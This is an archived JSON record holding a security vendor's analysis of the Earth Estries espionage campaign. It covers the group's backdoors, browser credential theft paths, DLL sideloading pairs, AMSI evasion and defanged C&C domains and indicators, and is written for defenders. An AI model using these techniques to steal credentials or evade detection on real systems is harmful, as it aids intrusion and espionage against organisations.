{ "id": "768fc151-afd9-404b-b6b5-adc18ed58da8", "created_at": "2026-04-06T00:17:35.290047Z", "updated_at": "2026-04-10T13:12:38.292958Z", "deleted_at": null, "sha1_hash": "2262c24115e3030b2c4a9eead986751226d2dc4d", "title": "Earth Estries Targets Government, Tech for Cyberespionage", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3815023, "plain_text": "Earth Estries Targets Government, Tech for Cyberespionage\r\nPublished: 2023-08-30 · Archived: 2026-04-05 17:16:23 UTC\r\nAPT \u0026 Targeted Attacks\r\nWe break down a new cyberespionage campaign deployed by a cybercriminal group we named Earth Estries.\r\nAnalyzing the tactics, techniques, and procedures (TTPs) employed, we observed overlaps with the advanced\r\npersistent threat (APT) group FamousSparrow as Earth Estries targets governments and organizations in the\r\ntechnology sector.\r\nBy: Ted Lee, Lenart Bermejo, Hara Hiroaki, Leon M Chang, Gilbert Sison Aug 30, 2023 Read time: 12 min (3192\r\nwords)\r\nEarlier this year, we discovered a new cyberespionage campaign by a hacker group we named Earth Estries. Based\r\non our observations, Earth Estries has been active since at least 2020. We also found some overlaps between the\r\ntactics, techniques, and procedures (TTPs) used by Earth Estries and those used by another advanced persistent\r\nthreat (APT) group, FamousSparrownews article.\r\nFrom a general overview of the tools and techniques used in this ongoing campaign, we believe the threat actors\r\nbehind Earth Estries are working with high-level resources and functioning with sophisticated skills and\r\nexperience in cyberespionage and illicit activities. The threat actors also use multiple backdoors and hacking tools\r\nto enhance intrusion vectors. To leave as little footprint as possible, they use PowerShell downgrade attacks to\r\navoid detection from Windows Antimalware Scan Interface’s (AMSI) logging mechanism. In addition, the actors\r\nabuse public services such as Github, Gmail, AnonFiles, and File.io to exchange or transfer commands and stolen\r\ndata.\r\nThis active campaign targets organizations in the government and technology industries based in the Philippines,\r\nTaiwan, Malaysia, South Africa, Germany, and the US. We detail our findings and technical analysis in this entry\r\nto guide security teams and organizations in reviewing the status of their respective digital assets and for them to\r\nenhance their existing security configurations.\r\nInfection vector\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 1 of 17\n\nFigure 1. The attack routine of Earth Estries\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 2 of 17\n\nWe found Earth Estries compromising existing accounts with administrative privileges after it successfully\r\ninfected one of the organization’s internal servers. By installing Cobalt Strike on the system, the actors behind\r\nEarth Estries were able to deploy more pieces of malware and perform lateral movement. Through the Server\r\nMessage Block (SMB) and WMI command line (WMIC), the threat actors propagated backdoors and hacking\r\ntools in other machines in the victim’s environment. At the end of each round of operations in a series of\r\ndeployments, they archived the collected data from a specified folder. According to our samples and analysis, the\r\nthreat actors targeted PDF and DDF files, which the actors uploaded to online storage repositories AnonFiles or\r\nFile.io using curl.exe.\r\nWe also noted that the threat actors regularly cleaned their existing backdoor after finishing each round of\r\noperation and redeployed a new piece of malware when they started another round. We believe that they do this to\r\nreduce the risk of exposure and detection.\r\nBackdoor and hacking tools\r\nWe observed the threat actors using various tools in this campaign, including information stealers, browser data\r\nstealers, and port scanners, among others. In this section, we focus on newly discovered and noteworthy toolsets\r\nand discuss their technical details.\r\nZingdoor\r\nZingdoor is a new HTTP backdoor written in Go. While we first encountered Zingdoor in April 2023, some logs\r\nindicate that the earliest developments of this backdoor took place in June 2022. However, it had rarely been seen\r\nin the wild and had only been observed being used in a limited number of victims, likely as a newly designed\r\nbackdoor with cross-platform capabilities. Zingdoor is packed using UPX and heavily obfuscated by a custom\r\nobfuscator engine.\r\nWe noted that Zingdoor adopts anti-UPX unpacking techniques. Generally, the magic number of UPX is “UPX!”,\r\nbut in this case it was modified to “MSE!”, and the UPX application cannot unpack this modified file. This\r\ntechnique is easy and in internet of things (IoT) types of malware, but it is considered rare in APT activities.\r\nZingdoor was disguised as mpclient.dll and designed to run via DLL sideloading by abusing Windows defender\r\nbinary MsSecEs.exe. Upon running the executable, Zingdoor registers the current parent process as a Windows\r\nservice with the name \"MsSecEsSvc\" for persistence and starts it. As a service process, Zingdoor connects and\r\nwaits for a command from the command-and-control (C\u0026C) server. Based on the functions defined in the\r\nbackdoor, it supports the following capabilities:\r\nGet system information\r\nGet Windows service information\r\nDisk management (file upload/download, file enumeration)\r\nRun arbitrary commands\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 3 of 17\n\nFigure 2. Modified UPX header for anti-UPX unpacking technique\r\nTrillClient\r\nTrillClient toolset is an information stealer designed to steal browser data, and is packed in a single cabinet file\r\n(.cab) and extracted through the utility application expand.exe. The CAB file contains a TrillClient installer and a\r\nstealer. Based on different arguments, the installer performs the following behaviors:\r\nTable 1. TrillClient arguments and behaviors\r\nArgument Description\r\n-install Installs itself as Windows service Net Connection\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 4 of 17\n\n-start {victim\r\nid}\r\nCreates a victim list based on the input victim ID (File name:\r\n7C809B4866086EF7FB1AB722F94DF5AF493B80DB)\r\nLaunches the TrillClient stealer through starting services\r\n-remove Cleans up the installation (Deletes the service)\r\nAs TrillClient is a custom browser data stealer written in Go, it is heavily obfuscated by a custom obfuscator for\r\nanti-analysis. Once launched, it looks for the victim list, 7C809B4866086EF7FB1AB722F94DF5AF493B80DB\r\ncreated by the installer. Afterward, it connects to a GitHub repository to retrieve the command for the next set of\r\nactions. The repository address is hard-coded in the malware as follows:\r\nhxxps://raw[.]githubusercontent[.]com/trillgb/codebox/main/config.json.\r\nFigure 3. Sample content of “config.json”\r\nValue.name is the victim ID, while value.value is a command. After receiving this configuration, TrillClient looks\r\nfor its own victim ID in the value.name list, and performs malicious activities based on the command defined by\r\nvalue.value. TrillClient supports the following commands:\r\nTable 2. TrillCient commands and functions\r\nCommand Function\r\n1 Does nothing\r\n2 Starts to collect browser credentials\r\n3 Schedules a task to collect browser credentials by 12 p.m. today or tomorrow\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 5 of 17\n\n4\r\nStarts to collect browser credentials after some time (no definite duration, estimated to be a\r\nrandom number of seconds)\r\nTrillClient steals the sensitive data found in the following directories:\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Local State\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\\u003cPROFILE\u003e\\Login Data\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\\u003cPROFILE\u003e\\Network\\Cookies\r\n%APPDATA%\\Microsoft\\Protect\\*\r\nThe collected data will be temporarily copied to \u003c%TEMP%\\browser_temp_data\u003cRANDOM\u003e\u003e, archived\r\nusingthe  .tar command, and encrypted with an XOR algorithm. Then the collected data will be sent to the threat\r\nactor’s email account trillgamby@gmail[.]com over SMTP (Simple Mail Transfer Protocol). Another noteworthy\r\ncapability of TrillClient is its ability to update its version. As the value of “version” defined in the downloaded\r\nconfig is newer than the current version number, it will download the newer one from the GitHub repository and\r\nupdate itself.\r\nHemiGate\r\nHemiGate is a backdoor used by Earth Estries. Like most of the tools used by this threat actor, this backdoor is\r\nalso executed via DLL sideloading using one of the loaders that support interchangeable payloads. K7AVMScn.exe\r\nfrom K7 Computing is the sideloading host utilized by this backdoor, while the loader poses as K7AVWScn.dll.\r\nThe main backdoor is an encrypted file named taskhask.doc, and another encrypted file named taskhask.dat serves\r\nas the configuration file.\r\nFigure 4. HemiGate sideloading sequence\r\nHemiGate communicates to its C\u0026C server over port 443 and performs a connection via proxy if required by the\r\nenvironment. The C\u0026C server is retrieved from the configuration file, which mainly contains C\u0026C server and port\r\ncombinations. The config file is decrypted using RC4 encryption with the key 4376dsygdYTFde3. This RC4 key is\r\nalso used in other encryption/decryption functions performed by the backdoor in most of its routines.\r\nCommunication with the server is performed using POST method, using the following predefined header:\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 6 of 17\n\nFigure 5. HemiGate communication header\r\nHemiGate executes in three instances:\r\nFirst instance. This instance is launched without any parameter. Its main purpose is to install startup\r\nmechanisms and execute the second instance. This instance will terminate once its purpose is finished.\r\nStartup 1. An entry in the autostart registry named “Windrive” is created.\r\nStartup 2. A service called “Windrive” with the full service name “Windows Drive Security” is\r\ncreated as another startup mechanism.\r\nSecond instance: Executed with the /a argument, this instance is responsible for reading the config file and\r\ncommunicating with the C\u0026C server. It also serves as the launcher and will communicate with the third\r\ninstance via named pipes. In addition, the second instance performs the following functions:\r\nUpdates the configuration\r\nReceives the data captured by the keylogger function via pipe and logs it into a file\r\nServes as watchdog for the third instance\r\nDirectly executes backdoor commands if the parameter is satisfied or if the pipe communication\r\nfails\r\nPasses backdoor command execution to the third instance if the parameter from the C\u0026C is true and\r\nthe pipe communication is successful\r\nExecutes a full uninstall if the command is received from the C\u0026C\r\nThird instance. This instance is launched with the /u \u003cPID of instance 2\u003e argument. The following are its\r\ntwo main functions:\r\nExecutes the keylogger routine and passes captured data to the second instance via pipe\r\ncommunication\r\nKeylogger communication is done via \\\\[.]\\pipe\\Key[500]\r\nOpens a pipe to receive and executes commands passed by the second instance\r\nCommands are received via \\\\[.]\\pipe\\\u003cusername\u003e\\[\u003csession number\u003e]\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 7 of 17\n\nFigure 6. HemiGate process tree\r\nThe keylogger feature utilizes a non-interactive static control window by creating a window with a predefined\r\n“static” class. A timer function is then used alongside a keyboard hook to log the keystrokes on an active window\r\ncontinuously, so long as the window remains active. The keystroke is logged using the following structure:\r\nUser: Active user at the time of logging\r\nTitle: Active window title\r\nTime: Time of the keystroke log (format: dd/mm hh:mm:ss)\r\nKey: Logged keystrokes\r\nAside from the keylogger, the following features are also available:\r\nDirectory monitoring: Sets a directory notification handle to receive notifications for added files, deleted\r\nfiles, changes in files, and file name changes (records old and new names) in the target directory. The\r\nchanges recorded are stored in the file named “fm.”\r\nFile content read/write: Allows to write contents to a target file or to read the contents of the target file.\r\nFile operations: Performs operations like enumerate drives, move, copy, rename, or delete files, create\r\ndirectories, or open files using their default applications.\r\nShell: Launches an interactive command shell.\r\nCMD: Executes a command via cmd (one-time execution).\r\nScreenshot: Takes a screenshot of the active desktop window.\r\nProcess monitor: Enumerates currently running processes and allows the termination of a target process.\r\nHeavy use of DLL sideloading\r\nWe observed that Earth Estries relies heavily on DLL sideloading to load various tools within its arsenal. Aside\r\nfrom the backdoors previously mentioned, this intrusion set also utilizes commonly used remote control tools like\r\nCobalt Strike, PlugX, or Meterpreter stagers interchangeably in various attack stages. These tools come as\r\nencrypted payloads loaded by custom loader DLLs.\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 8 of 17\n\nA notable feature of the loaders used is that the decryption key is in the encrypted payload. We observed that this\r\nintrusion set utilizes the same loader file while loading a different payload in the same target environment.\r\nDuring our investigation, we learned several sideloading combinations used by Earth Estries and enumerate them\r\nin the following table:\r\nTable 3. Legitimate executables and sideloaded DLLs abused by Earth Estries\r\nAffected vendor Legitimate executables Sideloaded DLL\r\nCanon Inc. ijplmui.exe IJPLMCOM.dll\r\nBrother Industries Ltd (Signer:\r\nDell Inc.)\r\nbrdifxapi.exe\r\nbrlogapi.dll /\r\nbrlogapi64.dll\r\nIObit Malware Fighter imfsbCrypto.exe imfsbDll.dll\r\nK7 Computing Pvt Ltd K7AVMScn.exe K7AVWScn.dll\r\nK7 Computing Pvt Ltd K7TSVlog.exe K7UI.dll\r\nK7 Computing Pvt Ltd K7SysMon.EXE K7SysMn1.dll  \r\nMicrosoft Corporation iisexpresstray.exe mscoree.dll\r\nNetgate Technologies s.r.o. seanalyzertool.exe msimg32.dll\r\nOracle Corporation jps.exe jli.dll\r\niTop Inc. (Signer: Orange View\r\nLtd)\r\ngraphics-check.exe (renamed as sfc.exe by\r\nattacker)\r\ndxgi.dll\r\nXanasoft.com SandboxieBITS.exe SbieDll.dll\r\nBy and large, the DLL sideloading attacks we've observed are against older versions of legitimate files, some even\r\na decade old, in a bid to convert them into LOLBins. Attackers are using this opportunistic tactic in the hopes of\r\nthem being ignored by security products. This situation makes it even more important to implement version\r\ncontrols and application baselines to detect anomalies and prevent attackers from gaining footholds in the\r\nenterprise environment.\r\nC\u0026C server infrastructure\r\nWe observed that some of the Cobalt Strike implants Earth Estries used utilized Fastly CDN service to hide the\r\nactual IP address. We’ve also previously observed the use of Fastly CDN in other campaigns by some APT41-\r\nrelated groups such as Earth Longzhi and GroupCC.\r\nLooking into other Earth Estries’ C\u0026C activities observed from their victims’ environments, we discovered some\r\nnotable pieces of data in the registrant information as follows:\r\nTable 4. Information on C\u0026C activities referenced with WHOIS protocol\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 9 of 17\n\nDomain Registrant information\r\nnx2.microware-help[.]com\r\neast.smartpisang[.]com\r\nRegistrar: Xin Net Technology Company\r\nRegistrar: Bizcn, Inc.\r\ncdn728a66b0.smartlinkcorp[.]net\r\nOrganization: De Wang Mao Yi You Xian Gong Si (De Wang 貿\r\n易有限公司)\r\nCity: Qinyuanshi (清遠市)\r\ncdn-6dd0035.oxcdntech[.]com\r\nOrganizaton: De Wang Mao Yi You Xian Gong Si (De Wang 貿易有限\r\n公司)\r\nvultr-dns[.]com Email: 3280132818@qq.com \r\nThe domains observed in Table 4 were observed from real incidents. According to public repositories, those C\u0026C\r\ndomains share the same registrant information. We infer that the domains have preferences when it comes to\r\nregistrant information. In addition, these domains share similar C\u0026C address formats, some of which we observed\r\nwhile tracking their operations. While our investigation is ongoing to determine whether these domains and\r\nregistrant data are related to the threat actors, we do know that these pieces of information can be used to pivot\r\nother related C\u0026C domains, likely used by the same group.\r\nBased on the registrant information, we found more records of the old domain registered by the threat actors. \r\nTable 5. History of registered domains following the keyword “De Wang Mao Yi You Xian Gong Si”\r\nDomain keyword search: \"De Wang Mao Yi You Xian Gong Si\"\r\nDomain Registered/First seen Expires/ Last seen\r\nrtsafetech.]com Oct 8, 2022  Oct 8, 2023\r\nkeyplancorp[.]com Dec 22, 2021  Dec 16, 2023 \r\ntrhammer[.]com Sep 5, 2022 Jul 12, 2023 (Last seen)\r\nrthtrade[.]com Nov 23, 2021 Nov 23, 2023\r\nsmartlinkcorp[.]net May 2, 2022 (First seen) Jul 12, 2023 (Last seen)\r\noxcdntech[.]com Feb 15, 2023 (First seen) Jul 12, 2023 (Last seen)\r\nrtwebmaster[.]com Nov 20, 2021 (First seen) Jul 12, 2023 (Last seen)\r\nTable 6. History of registered domains following the keyword “3280132818@qq.com”\r\nDomain keyword search: “3280132818@qq.com”\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 10 of 17\n\nDomain Registers Expires\r\nmncdntech[.]com Jul 4, 2023 Jul 4, 2024\r\nsubstantialeconomy[.]com Jun 30, 2023 May 25, 2024\r\njptomorrow[.]com Jun 19, 2023 Apr 19, 2024\r\nvultr-dns[.]com Jun 10, 2023 Jun 10, 2024\r\njttoday[.]net May 21, 2023 Mar 21, 2024\r\nChecking all the domains, we observed that smartlinkcorp[.]net yielded the most information from public\r\nrepositories and the threat intelligence community. Digging into the domain, we discovered a record of a related\r\nsubdomain, “ns2.smartlinkcorp[.]net”. In addition, Cobalt Strike was once hosted on ns2.smartlinkcor[.]net with \r\nthe watermark 2029527128. Based on the watermark, we found more related domains and IP records. \r\nFigure 7. Cobalt Strike records found\r\nFrom these Cobalt Strike records, we noticed two new domains, digitelela[.]com and z7-tech[.]com, which we did\r\nnot observe in our initial investigations. We then found another domain set possibly used by the threat actors based\r\non the registrant information. \r\nTable 7. Registered domains’ histories following the keyword “3087384364@qq[.]com”\r\nDomain keyword search: “3087384364@qq[.]com”\r\nDomain Registers Expires\r\nz7-tech[.]com Apr 8, 2023 07:40:13 a.m. May 7, 2024 06:12:13 a.m.\r\nhammercdntech[.]com Apr 2, 2023 09:06:05 p.m. Feb 1, 2024 01:10:53 a.m.\r\nlinkaircdn[.]com Mar 20, 2023 11:00:31 p.m. Apr 6, 2024 07:56:21 a.m.\r\nrtsoftcorp[.]com Mar 12, 2023 11:30:17 p.m. Mar 13, 2024 06:31:22 p.m.\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 11 of 17\n\npublicdnsau[.]com Feb 2, 2023 10:40:27 p.m. Mar 7, 2024 06:11:58 p.m.\r\nuswatchcorp[.]com Jan 1, 2023 10:48:42 p.m. Feb 11, 2024 06:40:36 p.m.\r\nanynucleus[.]com Oct 30, 2022 06:11:31 a.m. Nov 15, 2023 11:12:23 p.m.\r\ndigitelela[.]com Oct 7, 2022 07:27:56 p.m. Oct 2, 2023 06:00:40 p.m.\r\ndns2021[.]net Apr 10, 2022 09:33:30 a.m. Feb 27, 2023 07:59:16 a.m.\r\nlyncidc[.]com N/A Aug 19, 2021 01:00:32 a.m.\r\nLike the domain sets we found listed in Table 4, there are several common pieces of information, such as the\r\ncountry registration derived under these domains and subdomains. Specifically, the domains follow a ns{number}.\r\n{domain} format and are designed for a Cobalt Strike beacon to send and receive commands via DNS tunneling.\r\ncdn-xxxxx.{domain}\r\ncdnxxxxxxxx.{domain}\r\nxxxxxx.ns1.{domain}\r\nxxxxxx.ns2.{domain}\r\nxxxxxx.ns3.{domain}\r\nxxxxxx.ns4.{domain}\r\nAnalyzing the preceding C\u0026C domains and the resolved IP addresses, we found their C\u0026C servers hosted on\r\nvirtual private server (VPS) services located in different countries. We summarize the distribution of C\u0026C servers\r\nhere:\r\nFigure 8. Heat map distribution of C\u0026C server services used by Earth Estries\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 12 of 17\n\nVictimology\r\nBased on our investigation, Earth Estries focuses its attack targeting and attempts on government-related\r\norganizations and technology companies in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the\r\nUS. We also observed the network traffic to C\u0026C servers in Canada and the occurrence of toolset detections in\r\nIndia and Singapore, making these regions potentially highly affected regions. Organizations in the identified\r\ncountries should not only reexamine their systems for possible intrusions and unauthorized traffic exchanges but\r\nalso reinforce their existing security measures.\r\nFigure 9. Distribution of targeted and potentially affected countries\r\nAttribution\r\nWhile tracking the campaign, we noticed the threat actors using “ping” to test if a remote server is available before\r\naccessing it. Figure 10 shows one of the tests performed by Earth Estries, at the same time our tracking found that\r\nthe threat actors tried to see if the remote server with IP address 103.133.137[.]157 is available.\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 13 of 17\n\nFigure 10. Sample tracking Earth Estries’ ping tests (Screenshot taken using Trend Vision One™)\r\nIn addition, Earth Estries used some tools and TTPs that overlap with FamousSparrow. We compared the backdoor\r\nloader used in this campaign to the loader mentioned in the previous reportnews article. As for TTPs, Earth Estries\r\nalso tends to use .CAB files to deploy their malware and toolset to the victim’s environment, which reinforced the\r\ntracking we found and initial country reports responsible for the attacks. \r\nFigure 11. The loader previously mentioned in an earlier report (left), and the loader we observed\r\nfrom the latest campaign (right)\r\nConclusion\r\nEarth Estries is a sophisticated hacker group that has been active since at least 2020 and that focuses on deploying\r\ncyberespionage campaigns. It targets government and technology organizations in various countries and is capable\r\nof implementing advanced techniques such as the use of multiple backdoors and hacking tools to gain access to its\r\ntargets.\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 14 of 17\n\nBy compromising internal servers and valid accounts, the threat actors can perform lateral movement within the\r\nvictim's network and carry out their malicious activities covertly. The use of Zingdoor as part of the routine to\r\nensure that the backdoor cannot be unpacked easily drive additional challenges for analysts and security teams to\r\nmake it more difficult to analyze. They also use techniques like PowerShell downgrade attacks and novel DLL\r\nsideloading combinations to evade detection. Moreover, the code similarities and TTPs between Earth Estries and\r\nFamousSparrow suggests a possible connection between them. Other pieces of evidence, such as tracked IP\r\naddresses and common technical formatting themes observed in their operation, indicate strong ties that can be\r\ninvestigated and analyzed further.\r\nUnderstanding the methods used by Earth Estries can help organizations improve their security measures and\r\nprotect their digital assets. It is essential for individuals and companies to stay vigilant and take necessary actions\r\nto enhance their cybersecurity to safeguard against such cyberespionage campaigns. Trend Vision One™one-platform provides security teams and analysts to visualize all the separate components of the organization from a\r\nsingle platform to monitor and track the tools, behaviors, and payloads as the routine attempts to move and\r\nexecute in the organization’s networks, systems, and infrastructure while simultaneously detecting and blocking\r\nthe threats as left of the attack or infection routine as possible.\r\nMITRE ATT\u0026CK\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 15 of 17\n\nIndicators of Compromise (IOCs)\r\nDownload the list of IOCs here.\r\nTags\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 16 of 17\n\nSource: https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nhttps://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "ETDA" ], "origins": [ "web" ], "references": [ "https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html" ], "report_names": [ "earth-estries-targets-government-tech-for-cyberespionage.html" ], "threat_actors": [ { "id": "f67fb5b3-b0d4-484c-943e-ebf12251eff6", "created_at": "2022-10-25T16:07:23.605611Z", "updated_at": "2026-04-10T02:00:04.685162Z", "deleted_at": null, "main_name": "FamousSparrow", "aliases": [ "Earth Estries" ], "source_name": "ETDA:FamousSparrow", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "5b317799-01c0-48fa-aee2-31a738116771", "created_at": "2022-11-20T02:02:37.746719Z", "updated_at": "2026-04-10T02:00:04.561617Z", "deleted_at": null, "main_name": "Earth Longzhi", "aliases": [ "Earth Longzhi" ], "source_name": "ETDA:Earth Longzhi", "tools": [ "Agentemis", "BigpipeLoader", "Cobalt Strike", "CobaltStrike", "CroxLoader", "MultiPipeLoader", "OutLoader", "Symatic Loader", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "f0eca237-f191-448f-87d1-5d6b3651cbff", "created_at": "2024-02-06T02:00:04.140087Z", "updated_at": "2026-04-10T02:00:03.577326Z", "deleted_at": null, "main_name": "GhostEmperor", "aliases": [ "OPERATOR PANDA", "FamousSparrow", "UNC2286", "Salt Typhoon", "RedMike" ], "source_name": "MISPGALAXY:GhostEmperor", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d196cb29-a861-4838-b157-a31ac92c6fb1", "created_at": "2023-11-04T02:00:07.66699Z", "updated_at": "2026-04-10T02:00:03.386945Z", "deleted_at": null, "main_name": "Earth Longzhi", "aliases": [ "SnakeCharmer" ], "source_name": "MISPGALAXY:Earth Longzhi", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a09ade2a-6b87-4f9a-b4f8-23cf14f63633", "created_at": "2023-11-04T02:00:07.676869Z", "updated_at": "2026-04-10T02:00:03.389898Z", "deleted_at": null, "main_name": "Earth Estries", "aliases": [], "source_name": "MISPGALAXY:Earth Estries", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d390d62a-6e11-46e5-a16f-a88898a8e6ff", "created_at": "2024-12-28T02:01:54.899899Z", "updated_at": "2026-04-10T02:00:04.880446Z", "deleted_at": null, "main_name": "Salt Typhoon", "aliases": [ "Earth Estries", "FamousSparrow", "GhostEmperor", "Operator Panda", "RedMike", "Salt Typhoon", "UNC2286" ], "source_name": "ETDA:Salt Typhoon", "tools": [ "Agentemis", "Backdr-NQ", "Cobalt Strike", "CobaltStrike", "Crowdoor", "Cryptmerlin", "Deed RAT", "Demodex", "FamousSparrow", "FuxosDoor", "GHOSTSPIDER", "HemiGate", "MASOL RAT", "Mimikatz", "NBTscan", "NinjaCopy", "ProcDump", "PsExec", "PsList", "SnappyBee", "SparrowDoor", "TrillClient", "WinRAR", "Zingdoor", "certutil", "certutil.exe", "cobeacon", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "f9806b99-e392-46f1-9c13-885e376b239f", "created_at": "2023-01-06T13:46:39.431871Z", "updated_at": "2026-04-10T02:00:03.325163Z", "deleted_at": null, "main_name": "Watchdog", "aliases": [ "Thief Libra" ], "source_name": "MISPGALAXY:Watchdog", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "6477a057-a76b-4b60-9135-b21ee075ca40", "created_at": "2025-11-01T02:04:53.060656Z", "updated_at": "2026-04-10T02:00:03.845594Z", "deleted_at": null, "main_name": "BRONZE TIGER", "aliases": [ "Earth Estries ", "Famous Sparrow ", "Ghost Emperor ", "RedMike ", "Salt Typhoon " ], "source_name": "Secureworks:BRONZE TIGER", "tools": [], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434655, "ts_updated_at": 1775826758, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2262c24115e3030b2c4a9eead986751226d2dc4d.pdf", "text": "https://archive.orkl.eu/2262c24115e3030b2c4a9eead986751226d2dc4d.txt", "img": "https://archive.orkl.eu/2262c24115e3030b2c4a9eead986751226d2dc4d.jpg" } }